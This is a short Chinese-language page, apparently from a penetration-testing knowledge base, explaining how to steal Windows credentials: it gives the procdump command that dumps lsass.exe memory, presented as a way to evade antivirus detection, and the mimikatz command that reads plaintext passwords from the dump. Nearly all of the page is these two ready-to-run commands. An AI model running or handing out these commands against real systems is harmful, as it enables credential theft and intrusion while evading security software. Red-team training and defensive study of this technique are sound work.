menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 001-4.1 凭据窃取 chevron_right 002-4.1.2 procdump+mimikatz.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    002-4.1.2 procdump+mimikatz.md
    653 B / 2021-07-17 00:01:40
        ### 4.1.2 procdump+mimikatz

Procdump 是微软官方发布的一款调试工具,因此不会被各种杀毒软件查杀。可使用 procdump 加 mimikatz 来躲避杀软检测。

官方下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

#### 1、使用 procdump 将目标的 lsass.exe 转储成 dmp 文件

```bash
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

```

![](images/yushentou/15899738395527.png)


#### 2、使用 mimikatz 从转储的 lsass.dmp 中来读取明文密码

```bash
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"

```

![](images/yushentou/15899738685542.png)
    links
    file_download